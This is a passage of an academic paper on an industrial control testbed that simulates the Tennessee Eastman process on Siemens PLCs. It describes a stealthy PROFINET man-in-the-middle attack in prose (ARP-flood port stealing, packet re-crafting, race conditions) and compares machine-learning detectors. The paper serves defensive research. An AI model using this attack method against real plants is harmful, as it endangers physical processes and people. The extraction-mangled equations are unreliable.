main PI controllers. Accordingly, all the PI controllers' gains have been selected from the original paper in [31]. Subsequently, in order to convert the process to a real-time process in terms of process run time, all the Ti's gains are multiplied by 3600. The corresponding measurements and control inputs for each I/O module and the corresponding PLC are speci ed in Fig. 2. Moreover, as illustrated in this gure, XMEAS 17 and the production rate (FP as the internal variable in the PLC1) are also required by the other PLCs, which are implemented by using the Siemens S7 communication protocol. TABLE 4. Distribution of the TE control blocks in PLCs. C. SUPERVISORY LAYER As depicted in Fig 1, the supervisory layer that consists of the PLC 6 is the last layer of the TE testbed. Each Siemens S7-1200 contains internal memory that can be accessed FIGURE 2. The TE process block diagram. through a web-server. In other words, the web-server provides a local cloud that allows the user access and control over the PLC internal memory, stop/run PLC and many other features remotely (through the PLC static IP address). In the devel- oped testbed as shown in Fig 2, by using the Siemens internal communication protocol known as the S7 communication, all measurements and actuator data of each PLC are transferred to and are stored in the PLC 6 internal memory. Subsequently, these data can be downloaded from the web-server for train- ing or for online cyber attack detection purposes as will be presented and described in Section V. D. VULNERABILITIES AND CYBER ATTACK GATEWAYS AND POINTS Figure 2 illustrates the cyber attack gateways and points on the testbed where the malicious hackers can gain access to the communication link between the PLC and I/O modules. By accessing each communication link, the malicious hack- ers can inject different cyber attacks on the sensor mea- surements as well as actuator commands corresponding to that communication link. For example, as shown in Fig. 2 and Table 4, if the hacker accesses the communication link between the PLC1 and the I/O module 1 (labeled as commu- nication link #1), then the sensor measurements XMEASs 2, 3, 17 and 40 and the actuator commands XMVs 1 and 2 can be compromised. III. COMMUNICATION PROTOCOLS A. PROFINET Siemens S7-1200 utilizes the PROFINET protocol suite as an industrial Ethernet standard and S7-communication pro- tocol in order to communicate with other network nodes. PROFINET protocol is the standard protocol which is being facilitated heavily by Siemens as one of the main indus- trial Ethernet communication protocols. It has inherited its architecture from the native OSI model of TCP/IP for cyclic and acyclic data and UDP/IP for context manage- ment. A PROFINET architecture/system requires at least three nodes to operate, namely: the IO Controller (PLC), the IO Module (Sensor and Actuator), and the IO Supervisor VOLUME 9, 2021 16243 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed (Engineering Station or HMI Device). Moreover, PROFINET inherits variety of Information Technology protocols within its substructure to establish and maintain connectivity, which is susceptible to similar structure cyber attack surfaces that are present in the standard Ethernet environments. One of the main characteristics of the PROFINET protocol suite that distinguishes itself from the other ICS protocols is that it prioritizes the type of communication based on real-time requirements. Consequently, as shown in Fig. 3, two channels are being introduced as Real-Time (RT) and Non- Real-Time (NRT) and both channels coexist in the Appli- cation Relation (AR) between the IO Device and the IO Controller. An Application Relation is a state which both the IO Device and the IO Controller need to converge to, in order to initialize the transmission of the Cyclic Data. However, a handshake is a perquisite to this state which is being conducted by the pro net Context-Manger (PN-CM). FIGURE 3. PROFINET IO RT and the NRT Stack18. In terms of the C.I.A security aspects (con dentiality, integrity and availability) of the PROFINET protocol, it is shown in this work that to compromise con dentiality of the cyclic data, through an Address Resolution Protocol (ARP)- compromising attack a hacker can read the data in the plain text; to compromise integrity, the hacker can inject false data through the network switch; and to compromise availability, a port stealing attack would make the service temporarily unavailable. B. PROFINET IO REAL-TIME PROTOCOL STRUCTURE In order to guarantee real-time synchronicity in data trans- mission, certain layers of the OSI model have been omitted in PROFINET IO (PNIO) as illustrated in Fig. 3, which results in lower overhead communication ows. Hence, as shown in Fig. 4, in the real-time structure the dissection of a frame only consists of the Ethernet Header and the PROFINET Application Layer and which is speci ed as follows: a) Frame-ID: Indicates the type of the frame which is set as 8; 000 for cyclic real-time data. b) IO Data: Sensor measurements and actuator signals are referred to as IO Data. c) IO Data's Status: Represents the status of a given vari- able in the frame. 18Courtesy of pro netuniversity.com FIGURE 4. PROFITNET IO real-time packet structure. d) Cycle Counter: An incremental value, which is being incremented from the source, with an error checking purpose. e) Data Status: Indicates the validity of the entire packet. In the IO module, the data cycle update time, which is denoted by dt, can be set based on the system require- ments from 2 to 512 msec, which represents the rate of data exchange between the IO module and the PLC. In the developed testbed, given the slow behavior of the TE pro- cess, this value is set to dtD512 msec, which implies that 4 data samples are communicated in each full cycle (2 seconds). Fig. 5 shows the cycle counter corresponding to dtD512 msec. FIGURE 5. Cycle counters corresponding to dtD512 msec. IV. CYBER ATTACK INJECTION In this section, our methodology for injecting cyber attacks on the developed testbed is presented. Generally, differ- ent protocols enable various attack surfaces such as the Data Integrity (DI) attack (e.g. manipulating sensor mea- surements), and Denial-of-Service (DoS) which causes dis- ruption of communication ow among entities. In an ICS architecture, cyber attacks can be categorized into two gen- eral types, namely as con guration and operational attacks. In the con guration attack, the malicious hacker targets the con guration protocols of the ICS, and consequently gets access to full control of the system. On the other hand, in the operational attacks, the malicious hacker mainly targets the operational communication protocol such as the PROFINET IO Real-time data, in which critical eld data are transferred. For this cyber attack to take place, it is assumed thatV (i) The hacker has a eld level access to the IO Module and PLCs. 16244 VOLUME 9, 2021 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed (ii) Hacker has knowledge of the physical system, implying that, he/she is aware of what is being transmitted from the sensors and what are being transferred to actuators. In [34], the authors exploit a vulnerability of the PROFINET Discovery and Basic Con guration Proto- col (DCP) to inject DoS attacks through port stealing, against the application relation between the IO Controller and the IO Device. This type of cyber attack is not designed to be stealthy and has a higher probability of detection. An early attempt for false data injection through port stealing is presented in [35] although the developed attacks are notimplemented on a real testbed. In this paper, based on the structure and features of the PROFINET, a false data attack is injected into the PROFINET IO. Real-time data through the man-in-the-middle (MITM) structure is also validated on the developed testbed. This is mainly achieved by utilizing the ARP in which the port of the victim on the shared medium (such as a switch) is stolen and the hacker acts as a Man-in-the-Middle (MITM) in the closed-loop system that can modify the sensor measurements that are sent to the PLC. The PROFINET IO devices do not have any endpoint secu- rity functionality [36] which allows cyber attacks feasible once a malicious hacker has a physical access to a device or its network connections. One of the most effective and damaging cyber attacks on the PROFINET IO devices is the MITM cyber attack. The MITM cyber attack will be implemented in our devel- oped testbed, by utilizing the Port Stealing methodology. In the Port Stealing attack, the switch MAC table is compro- mised such that the hacker's MAC address is registered in place of the victim. Therefore, the intended port from the I/O module is stolen by the hacker, and consequently he/she can transmit false data to the PLCs. Port Stealing is an active cyber attack which allows a hacker to sniff packets in a switched network as well as mod- ify packets by injecting new packets. This cyber attack targets the Application Relationship between the IO Controllers and the IO devices. Successful Port Stealing requires the hacker to synchronize with the real-time data communication and establish a race condition. The complete Port Stealing strat- egy is developed as follows: ARP Flooding: First, an ARP packet is constructed by setting the packet destination and source MAC address to the hacker MAC and the victim MAC, respectively. Subsequently, by injecting high ow rates of ARP pack- ets into the switch, the intended port victim is stolen. As shown in Figs. 6and victim 7, the MAC table of the switch is modi ed after the ARP ooding and the MAC address of the hacker is set as the MAC address of the IO module in the MAC address table. Receiving Data: In this step, the hacker receives data from the victim and modi es the sensor readings accord- ing to his/her knowledge of the process. The data received by the hacker is the raw IO data from the PROFITNET IO real-time packet as depicted in Fig. 4. FIGURE 6. Data exchange configuration before the ARP flooding. FIGURE 7. Data exchange configuration after the ARP flooding. Next, the hacker needs to map the raw IO data into an actual sensor reading in order to be able to modify it precisely so that it will result in a desired effect to the system. Here the assumption is that the hacker has knowledge of the physical process and the control system, and therefore can map the raw IO data to the actual sensor readings. Therefore, the hacker will be able to choose values that are not easily detectable by the operator, thus a stealth cyber attack will be realized and accomplished. Forwarding the Manipulated Data: In this step, the main MITM cyber attack is implemented whereby the hacker re-crafts the received frames and forwards the modi ed frames back to the victim. However, the received frames cannot only be forwarded back to the network due to existence of the cycle counter in the frame. There exists a threshold for the number of missing packets per cycle and its value can be set inside the TIA portal tool. Therefore, in order to overcome this issue, the re-crafted packets are sent in a full cycle. Moreover, as the hacker and the IO modules are simul- taneously sending the data to the PLC, a race condition is established between them in which the behavior of the system depends on the sequence or timing of events. With respect to Fig. 5, the race condition occurs if the hacker can send false data between the state tran- sitions, therefore the false data crafted by the hacker would arrive at the victim before the actual data. The signi cance of the hacker to win the race condition is that the hacker is capable of injecting false measurement data to the system. However, this injection has to be VOLUME 9, 2021 16245 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed sustained, at ideally every, or practically at most state transitions, for the hacker to be successful in winning the race condition. After winning the race condition, the hacker can receive the RTC1 frames which contain IO Data variables (process data). In order to increase the success probability of the cyber attack, the PLC should continually receive the mal-crafted data rather than the original data, therefore the hacker should send each mal-crafted data for more than one cycle. Fig. 8 depicts the entire process of implementing the false data injection cyber attack on the PROFINET. It should be noted that due to precise timing and synchronicity which are required in order to inject data into the PLC, we have used the C language and libpcap put reference library in order to make this methodology possible. The libpcap library works by capturing all the frames that are coming out of the physical medium into the data link layer. The alternative to using libpcap library is to use a packet capture software such as the Wireshark, however for our purposes this is not suitable since Wireshark captures and saves packets of ine. FIGURE 8. False Data Injection (FDI) through the port stealing. One important point regarding the implemented cyber attack is that if the hacker continues the port stealing for a long duration, this will disrupt the communication between the PLC and the IO. In this case, the attack becomes a Denial- of-Service (DoS) attack which can be easier to detect by operators. By stopping the port stealing step after a given time duration, such as 1 sec, the attacker is able to start the frame manipulation without disrupting the communication. V. CYBER ATTACK DETECTION (CAD) SCHEME In order to detect cyber attacks in our developed testbed, sev- eral machine learning-based detection strategies are proposed and implemented. As shown in Fig. 9, the cyber detection scheme is divided into three main steps, namely, (a) pre- processing, (b) main scheme, and (c) post-processing.A. PRE-PROCESSING In order to have a dataset with zero mean and unit variance (standardization), data normalization is performed. The key feature of data normalization is that it will boost the learning speed and optimizes the algorithm accordingly. Moreover, there are several available techniques for data normalization, based on the nature/requirement of the algorithms itself. B. MAIN SCHEMES Broadly speaking, anomaly detection schemes can be divided into ve main categories, namely (1) linear, (2) proximity- based, (3) probabilistic, (4) outlier ensembles, and (5) neural networks [7]. Consequently, in order to provide a comprehen- sive comparative study and evaluation the following schemes are chosen belonging to different categories: Linear: Principal Component Analysis (PCA) and One-Class Support Vector Machines (OCSVM). Proximity-Based: Local Outlier Factor (LOF) and k-Nearest-Neighbors (kNN). Outlier Ensembles: Isolation Forest (IF). 1) PRINCIPAL COMPONENT ANALYSIS (PCA) Principal Component Analysis (PCA) [37] is a method widely used to determine dominant subspaces in datasets based on eigenvectors of the covariance matrix that is des- ignated as the principle components. An anomaly detection technique can be developed based on variations from the nominal dominant subspaces in the dataset. Generally, the use of major components indicates global deviations from the majority of results, whereas the use of minor components may suggest smaller local deviations. Indeed, as illustrated in Algorithm 1, by performing the Singular Value Decom- position (SVD) over the normalized data, the eigenvalues and eigenvectors can be determined. Moreover, by computing the PCA-reconstructed representation from OXDXTTT, the approximated value ( OX) can be obtained. Therefore, by computing the maximum Euclidean distance between the normalized training data and the approximated one in the training set, threshold values can be determined. Conse- quently, for the testing data point (D), if the distance between the existing instance and the corresponding approximated value of that instance is above a given threshold value, then the instance can be considered and classi ed as a cyber attack. 2) ONE-CLASS SUPPORT VECTOR MACHINES (OCSVM) In the one-class support vector machine as a semi-supervised anomaly detection approach, the aim is to determine a hyper- sphere in the feature space with the minimum radius that contains all or most of the data points corresponding to the healthy operation of the system [38]. The hypersphere has two main parameters, namely the radius RTand its center awhich are obtained by solving an optimization problem as explained in Algorithm 2. Once, these parameters are obtained through the training stage, for each test data point D, one can obtain the distance between the data point and the hypersphere center aand if this distance is greater than RT, 16246 VOLUME 9, 2021 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed FIGURE 9. The proposed data-driven cyber attack detection methodology where r(t) denotes the decision flag corresponding to the real-time data point x(t). Algorithm 1 Principle Component Analysis (PCA) Training: Input: X- Training data, p- number of components to keep for PCA transformation. Output: Threshold Tr 1:Calculate SVD of the training data (X ) 2:Construct the transformation matrix Tby selecting the p dominant eigenvectors 3:Calculate the PCA-reconstructed representation, OXD XTTT 4:Find the Euclidean distance between OXandX,ED distance(OX;X) 5:Set the threshold as TrDmax(E ) Testing: Input: D- test data, Tr. Output: Test data ag r 1:Calculate the PCA-reconstructed representation of the testing data,ODDDTTT 2:Calculate the Euclidean distance between ODandD,eD distance(OD;D) 3:ife<Trthen 4: Dis normal, rD1. 5:else 6: Dis abnormal, rD0. 7:end then the point is classi ed as an anomaly, otherwise it is assigned as a healthy data. The only two hyper-parameters for the OCSVM are Cand, where Cis controlling the in uence of slack variables in the optimization process, and can be obtained from CD1 N, whererepresents the trade-off between the over tting and the generalization accuracy, and is the kernel coef cient. 3)k-NEAREST-NEIGHBORS (kNN) Thek-nearest-neighbor global unsupervised anomaly detec- tion scheme is a simple way to determine irregularities for not to be mistaken with the kNN classi cation scheme [39].Algorithm 2 One-Class Support Vector Machine (OCSVM) Algorithm Training: Input: xi- training data (i2f1; 2;3;:::; Ng),C. Output: The hypersphere centre aand its radius RT. Optimize i,iD1;:::; Nin minL( )DNX i;jD1 i jK(xi;xj)NX i;jD1 iK(xi;xi) subject to 0< i<CandPN iD1 iD1 where K(xi;xj)D exp(jj(x ixj)jj2 2 ). Compute the centre (a) and the radius (R T) of the hyper- sphere from: aDPN iD1 ixiand R2 TDmax kK(xk;xk)2NX iD1 iK(xk;xi) CNX i;jD1 i jK(xi;xj) Testing: Input: D- test data, the hypersphere centre aand its radius RT. Output: Test data ag r Compute R(D)DK(D;D)2NP iD1 iK(D;xi)CNP i;jD1 i jK(xi;xj) ifR(D)>RTthen Dis abnormal, rD1. else Dis normal, rD0. end As the name suggests, it specializes on global anomalies and is unable to identify local anomalies. In this approach, the hyper-parameter kdenote the number of nearest neighbors. VOLUME 9, 2021 16247 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed During the training phase, the decision score ascore corre- sponding to all the training points are computed as the Largest distance to their knearest neighbors [40] using the Ball-tree algorithm. The maximum value of ascorecorresponding to the training data is set as the threshold Tr. Then, as illustrated in Algorithm 3, for each test data point D, the decision score ascore(D) is compared with the computed threshold to detect a cyber attack. Algorithm 3 Nearest-Neighbor Algorithm Training: Input: xi- training data (i2f1; 2;3;:::; Ng),k, Output: Threshold Tr 1:foriD1;:::; Ndo 2: Compute the knearest neighbors of xiusing the Ball-tree algorithm. 3: Compute the decision score (a score(xi)) as the largest distance between xiand its nearest neighbors. 4:end 5:Set threshold as TrDmax i(ascore(xi)) Testing: Input: D- test data, xi- training data, Tr, Output: Test data ag r 1:Compute the knearest neighbors of Dusing the Ball-tree algorithm. 2:Compute the decision score (a score(D)) as the largest distance between Dand its nearest neighbors. 3:ifascore(D)>Trthen 4: Dis abnormal, rD1. 5:else 6: Dis normal, rD0. 7:end 4) LOCAL OUTLIER FACTOR (LOF) The local outlier factor (LOF) approach [41] is the most well-known local anomaly detection algorithm. In this algo- rithm, the concept of local anomalies is utilized where the LOF score is determined by matching the Local Reachability Density (LRD) of the record with respect to the LRDs of itsk-nearest neighbors as illustrated in Algorithm 4. In this approach, rst for the test data point Dand the training set X, thek-distance Dk(D) is de ned as Dk(D)Dd(D;x),x2X, where (a) there exist at least kdata points x02Xsuch thatd(D;x)d(D;x0), and (b) there exist at most k1 data points x02Xsuch that d(D;x)<d(D;x0), with d(D;x) denoting the distance between the point Dandxthat can be found by using different norms. Next, the k-distance neighborhood Nk(D) is de ned as follows Nk(D)Dfx2Xjd(D;x)Dk(D)g: It should be noted that the cardinality of Nk(D) that is denoted byjNk(D)jcan be generally greater than k. Then, the reach- ability distance of Dwith respect to x2Xis de ned as Rk(D;x)Dmaxfd (D;x);Dk(x)g:Algorithm 4 Local Outlier Factor (LOF) Algorithm Input: xi- training data, k,D- testing data Output: Test data ag r 1:Find the k-distance neighborhood Nk(D) 2:Compute the Local Reachability Density (LRD); LRD(D)DjNk(D)jP x2N k(D)Rk(D;x) 3:Compute LOF(D)DP x2Nk(D)LRD(x ) LRD(D)jN k(D)j 4:ifLOF(D)>threshold then 5: Dis abnormal, rD1. 6:else 7: Dis normal, rD0. 8:end Next, the Local Reachability Density LRD(D) and the Local Outiler Factor LOF(D) are obtained as explained in Algorithm 4. Finally, the test data point is classi ed as abnor- mal if LOF(D)>1. 5) ISOLATION FOREST (IF) The Isolation Forest (IF) scheme which is an unsupervised machine learning technique [42], [43] is now used as the strat- egy for performing the cyber attack detection objective. The key advantage of IF with respect to other anomaly detection schemes are as follows: (I) IF scheme does not utilize any distance or density measure to detect an anomaly, which elim- inates a major computational cost of distance computations, and (II) it has a linear time-complexity with a constant train- ing time and a minimal memory requirement [44]. These are two key features that are essential for online implementation of the IF for a real-time cyber attack detection process in industrial control systems. Cyber attack detection using the IF is performed in two stages, namely: (1) training, and (2) real-time testing. In the training phase, isolation trees are constructed by using the sub-samples of the normal healthy system operational dataset. In the online testing phase, the real-time data are fed to the trained IF for performing the cyber attack detection objective. In the training phase, given the training set XD fx1;:::; xNg,xi2Rdcorresponding to the normal operation of the system, mdifferent isolation trees Ti,iD1;:::; mare constructed by recursively splitting a sub-sample XiX until all the data points in Xiare isolated. For each isola- tion tree Ti, the sub-sample Xiis randomly selected without replacement from Xusing two hyper-parameters, nas the number of data-point used to train each tree, and fd as the number of features that are selected for training that isolation forest, i.e. XiDfx i;1;:::; xi;ng,xi;j2Rf. Each tree is speci ed by a set of nodes that are indexed by the pair (j; k), where jdenotes the depth of the node and kis the index of that node in the given depth, where 0 k2j1. Each internal 16248 VOLUME 9, 2021 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed node (j; k) has two children (jC1;2k) and (jC1;2kC1) and the root node is denoted by (0; 0). The isolation forest as shown in Algorithm 5is operating based on the concept of binary recursively splitting the feature spaceRdby each isolation tree Tias well as with randomly selecting a split feature q2f1;:::; fgand its split value p within the selected feature range. The scheme will be initiated with the root node (0; 0) and the training set Xiand the train- ing set for each node, denoted by Xj;k iis obtained recursively as follows. At the node (j; k), the data-points are splitted into two subsets XjC1;2k iDfx i;j2Xj;k i;jD1;:::; njxq i;j<pg andXjC1;2kC1 iDfx i;j2Xj;k i;jD1;:::; njxq i;jpg, until all samples are isolated, where xq i;jcorresponds to the qth element ofxi;j. In each splitting step at node (j; k), two children nodes (jC1;2k) and (jC1;2kC1) with the corresponding training datasets XjC1;2k iandXjC1;2kC1 iare generated. These can be an internal node if it is still possible to split the corresponding subset or an external node corresponding to the last node in the branch when the size of the data subset of that region is 1, or the maximum tree depth is reached. In case of an internal node, the data subsets XjC1;2k iandXjC1;2kC1 iare further splitted until an external node is reached. Algorithm 5 TrainTi.Xi/ Input: Xi- input data Output: anTi 1:Initialization: The root node with index (0; 0) and the training set X0;0 iDXi. Set jDkD0. 2:ifXj;k icannot be divided then 3: The node (j; k) is designated as the external node and no division will be performed for this node. 4:else 5: The node (j; k) is designated as the internal node 6: Randomly select a feature q2f1;:::; fg 7: Randomly select a splitting value pbetween the mini- mum and the maximum values of the feature qinXj;k 8: SetXjC1;2k iDfx i;j2Xj;k i;jD1;:::; njxq i;j<pg 9: SetXjC1;2kC1 iDfx i;j2Xj;k i;jD1;:::; njxq i;jpg 10: Recursion: Go to step 2 and continue splitting the nodes (jC1;2k) and (jC1;2kC1) 11:end The general concept for the cyber attack detection strategy by utilizing the IF is justi ed and rationalized by the fact that in the process of splitting data, the cyber attacks are different from the normal points and they can be isolated closer to the root of the tree. Consequently, they have a shorter path from the root. In the real-time cyber attack detection process, for each new sample measurement D, the path length in the ith tree Ti, as denoted by hi(D), is obtained by counting the number of edges from the root node to an external node as the sample Dis splitted through the isolation tree Ti. Consequently, the average path length of all trees is obtainedas followsV havg(D)D1 mmX iD1hi(D); (1) Next, a score value is assigned to the new sample measure- ment Das s(D)D2havg(D) H; (2) where Hdenotes the average expected path length of the trees in the forest and is given by HD2 ln(n1)C1:22(n1)=N; (3) with Ndenoting as the total number of data-points in X. Finally, the cyber attack is detected by using the detection thresholdas followsV rD( 0 if s(D)> 1 if s(D):(4) C. POST-PROCESSING As illustrated in Fig. 9, in the post-processing stage, an obser- vation window of the last Wdata-points is used to perform the cyber attack detection decision making process. Specially, if 80% (80% is chosen based on the mesh search) of W ags r( ), 2[tW;t] corresponding to the the last Wdata points x(t) are isolated as anomaly by the anomaly detection scheme, then the current data-point x(t) is identi ed as a cyber attack. The main goal of the window-based post- processing scheme is to reduce the number of false alarms and to produce a smoother decision making process. VI. PERFORMANCE EVALUATION AND ASSESSMENT In this section, evaluation and validation of our proposed cyber attack detection schemes are provided and demon- strated for the developed TE testbed infrastructure. A. DATASET As previously indicated, the proposed methodologies of this work are demonstrated by using the real datasets that are generated from the implemented ICS testbed. The gener- ated dataset consists of 25 variables such that 16 variables are corresponding to the sensor measurements and 9 vari- ables are corresponding to the actuator signals. Two types of datasets are generated, where initially the testbed was run for almost 72 hours under the normal condition (that is, cyber attack free) for generating the training set of the size (2596827) (after removing the initial transient behavior), i.e.ND96827. Subsequently, the testbed was run several times subject to different cyber attack scenarios and different cyber attack gateways and points. Towards this end, false data injection (FDI) cyber attacks are injected in the communication channels between the I/O modules and the corresponding PLC through online scaling the sensor measurement data with the scaling factor . Four different cyber attack scaling scenarios are considered as VOLUME 9, 2021 16249 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed 2f0:98; 0:96; 0:94; 0:92g, with the cyber attack duration of two hours. For instance, PLC 3 receives four measurements, namely, y12,y14,y15, and y17and the cyber attack on PLC 3 can be modeled asV yiaDyi; iD12;14;15;17 (5) where yiacorresponds to the i-th measurement under cyber attack. Figure 10 illustrates the FDI on y12andy15in PLC 3 for all the four scaling cyber attack scenarios. These four cyber attack scenarios are repeated for all the ve PLCs, and hence 20 different cyber attack scenarios are injected. Consequently, the test dataset with the size of (25 128159) has been generated such that 68113 out of 128159 correspond to cyber attacks and the rest are healthy data. The sampling time for data logging was 2 seconds for both datasets. FIGURE 10. Measurements under cyber attacks for PLC3. B. TRAINING OF PROPOSED METHODOLOGIES The training of the proposed schemes and structures are performed by using an open-source Machine Learning library for the Python programming language, which is known as the Scikit-learn library and PyOD toolbox [7], [45]. Furthermore, the training is performed by using an 8-fold cross-validation such that each structure is trained 8 times. Moreover, the hyper-parameters of each scheme are set based on the mesh-search around the recommended values in PyOD [7]. C. PERFORMANCE EVALUATION METRICS The confusion matrix is a form of contingency table with two dimensions identi ed as True and Predicted, and a set of classes corresponding to both dimensions, as presented in Table 5. The following detection and classi cation perfor- mance metrics are derived from the confusion matrix [46] as follows: TABLE 5. The confusion matrix. 1) ACCURACY Accuracy speci es the closeness of measurements to a spe- ci c category/class and it is computed asV AccuracyDTPCTN TPCFPCTNCFN(6)2) RECALL Recall is the True Positive Rate (TPR) and is computed asV TPRDTP TPCFN(7) 3) PRECISION Precision is the Positive Predictive Value (PPV) and is com- puted asV PPVDTP TPCFP(8) 4) F1 SCORE F1 Score is the harmonic average of the precision and recall, where it is at its best at a value of 1, implying perfect precision and recall and is computed byV F1D2PPVTPR PPVCTPR(9) It should be noted that the main aim of this section is to perform a quantitative comparison study of various cyber attack detection schemes is presented using the real-time data generated by the developed testbed. D. COMPARATIVE TESTING AND VALIDATION RESULTS In this subsection, a quantitative comparison study of various cyber attack detection schemes is presented. As previously indicated, the eld data are collected in real-time from the PLC's local cloud. Therefore, by implementing the cyber attack detection schemes on the process data in real time, the status of the data can be determined online. Table 6 provides the ef ciency of the proposed schemes. As illustrated is Table 6, the IF has the worst performance over the provided datasets due to high oscillation in the detection signal (high number of false negative alarms), while it has the fastest training time (speed) in comparison with the other techniques. Moreover, the OCSVM scheme has achieved quite promising results as compared to other meth- ods. In general, the training speed is directly proportional to the characteristics of the scheme. For instance, the IF infrastructure is based on combination of multiple decision trees (binary) which leads to having a considerably fast train- ing speed. On the other hand, OCSVM scheme calculates the decision boundaries about the data points, and hence its training speed is slow. Table 7shows the cyber attack detection time (DT) corresponding to various cyber attack scenarios. Overall, as expected from Table 6, the OCSVM and kNN have the fastest detection times and by increasing the cyber attack severity (), the cyber attack detection times are generally improved. However, for the IF algorithm, due TABLE 6. Performance of the proposed schemes. 16250 VOLUME 9, 2021 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed TABLE 7. The cyber attack detection time (DT). FIGURE 11. Cyber attack detection of the PLC3. to high oscillations in the original signal and effects of post processing algorithm, by increasing the detection times are not improved. Figures 11 and 12depict the performance of various cyber attack detection schemes for the scenarios of PLC3 and PLC5, respectively, where the ag ``0'' represents the healthy data and the ag ``1'' represents the cyber attack data. The scaling factors in these gures are D0:98; 0:96; 0:94 and D0:92, respectively. It should be noted that PLC 5 is the least sensitive one in terms of cyber attack detection due to low number of direct measurements as provided in Table 4. As shown in Figure 12, this fact leads to false negative alarms generation using IF while the other algorithms can still detect the attacks on PLC 5 without any false negative alarm. FIGURE 12. Cyber attack detection of the PLC5. E. THE COMPUTATIONAL COMPLEXITY The computational complexity analysis of machine learn- ing algorithms can be generally performed by computing theO-notion of each algorithm, which, represents the rate of the growth or the decline of the algorithm computa- tional complexity. In case of the nearest-neighbor based algorithms, the computational complexity of identifying the nearest-neighbors is O(N2) (where Nis the number of sam- ples) and the remaining computations, such as density or the LOF computations, can be ignored in the operations (less than 1% of the runtime). The complexity of the single-class SVM-based scheme is dif cult to compute since it depends on the number of support vectors and therefore on the data properties and characteristics of the results. Furthermore, thetuning of the SVMs that are used has a signi cant effect on the runtime as the computations have quadratic com- plexity. Nevertheless, the complexity of the OCSVM scheme can be scaled between O(dN2) toO(dN3), where ddenotes the number of features. The computational complexity of the PCA scheme is O(d2NCd3), and thus it relies strongly on the number of measurements. If the number of dimensions is low, the scheme in practice represent as among the fastest algorithms in our studies. Finally, the complexity of the IF scheme can be obtained to be O(tNlogN ), where tdenotes the number of trees [42]. VII. DISCUSSION AND CONCLUSION In this paper, a hybrid testbed is developed and implemented for an industrial control system (ICS) through real-time sim- ulating the Tennessee Eastman (TE) process as the physi- cal component of the testbed and implementing the other layers of the ICS using Siemens modules, such as PLC and distributed I/O. Due to various security aspects of ICS, there are many constraints and challenges in obtaining actual VOLUME 9, 2021 16251 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed eld data. Therefore, by generating and logging the data from the physical part of the proposed testbed, a dataset as close as possible to the real eld data is generated. Accord- ingly, by using this dataset, the impact of various real-time cyber attacks on the system and the corresponding proposed online detection approaches are studied. The Man-In-The- Middle (MITM) cyber attacks are directly implemented on the PROFINET communication protocols such that the mali- cious hacker can modify the sensor measurements that are sent to the PLC. Subsequently, several cyber attack detection approaches have been developed and implemented in real- time. Table 6 shows the overall performance of each cyber attack detection methodology under various malicious attack scenarios. Furthermore, Table 7 provides the cyber attack detection time for each scheme. Although, all the evaluated schemes have been able to detect the cyber attacks before shut-downing of the plant, however, the OCSVM scheme shows the best performance for this particular application. This study that is based on the proposed testbed can aid in determining the optimum approach for a particular ICS process that is based on speci ed constraints (e.g. the plant shutdown condition) and requirements (e.g. the plant produc- tion rate). It should be emphasized that none of the previous works in the literature have considered the full Tennessee Eastman process in their developed testbed. Also, to the best of the authors' knowledge, none of the previous work have worked on the PROFINET protocol for injecting real-time cyber attacks. Moreover, in most of the previous work, the cyber attack detection algorithms are implemented off-line after collecting the data from the testbed where as in this work, the cyber attack detection schemes are implemented all in real-time in the supervisory level of the testbed. Hence, in this work the online performance for our proposed cyber attack detection schemes are demonstrated and provided. Future work will involve the implementation of more com- plex multi-point cyber attacks on the testbed and evaluation of the performance of cyber attack detection and mitigation schemes in real-time on the testbed. ACKNOWLEDGMENT The statements made herein are solely the responsibility of the authors. REFERENCES [1] H. Holm, M. Karresand, A. Vidstr m, and E. Westring, ``A survey of industrial control system testbeds,'' in Proc. Nordic Conf. Secure IT Syst. Stockholm, Sweden: Springer, 2015, pp. 1126. [2] M. Mallouhi, Y. Al-Nashif, D. Cox, T. Chadaga, and S. Hariri, ``A testbed for analyzing security of SCADA control systems (TASSCS),'' in Proc. ISGT, Jan. 2011, pp. 17. [3] T. Morris, A. Srivastava, B. Reaves, W. Gao, K. Pavurapu, and R. Reddi, ``A control system testbed to validate critical infrastructure protection concepts,'' Int. J. Crit. Infrastruct. Protection, vol. 4, no. 2, pp. 88103, Aug. 2011. [4] H. Gao, Y. Peng, K. Jia, Z. Dai, and T. Wang, ``The design of ICS testbed based on emulation, physical, and simulation (EPS-ICS Testbed),'' in Proc. 9th Int. Conf. Intell. Inf. Hiding Multimedia Signal Process., Oct. 2013, pp. 420423.[5] I. N. Fovino, M. Masera, L. Guidi, and G. Carpi, ``An experimental platform for assessing SCADA vulnerabilities and countermeasures in power plants,'' in Proc. 3rd Int. Conf. Human Syst. Interact., May 2010, pp. 679686. [6] A. Bathelt, N. L. Ricker, and M. Jelali, ``Revision of the tennessee eastman process model,'' IFAC-Papers Line, vol. 48, no. 8, pp. 309314, 2015. [7] Y. Zhao, Z. Nasrullah, and Z. Li, ``PyOD: A Python toolbox for scalable outlier detection,'' J. Mach. Learn. Res., vol. 20, no. 96, pp. 17, Jan. 2019. [8] A. Winnicki, M. Kroto l, and D. Gollmann, ``Cyber-physical system discovery: Reverse engineering physical processes,'' in Proc. 3rd ACM Workshop Cyber-Phys. Syst. Secur., Apr. 2017, pp. 314. [9] M. Kroto l, A. Cardenas, and K. Angrishi, ``Timing of cyber-physical attacks on process control systems,'' in Proc. Int. Conf. Crit. Infrastruct. Protection, pp. 2945, Springer, 2014. [10] M. Kroto l, A. A. C rdenas, B. Manning, and J. Larsen, ``CPS: Driving cyber-physical systems to unsafe operating conditions by timing DoS attacks on sensor signals,'' in Proc. 30th Annu. Comput. Secur. Appl. Conf. (ACSAC), 2014, pp. 146155. [11] M. Kroto l, A. Cardenas, J. Larsen, and D. Gollmann, ``Vulnerabilities of cyber-physical systems to stale dataDetermining the optimal time to launch attacks,'' Int. J. Crit. Infrastruct. Protection, vol. 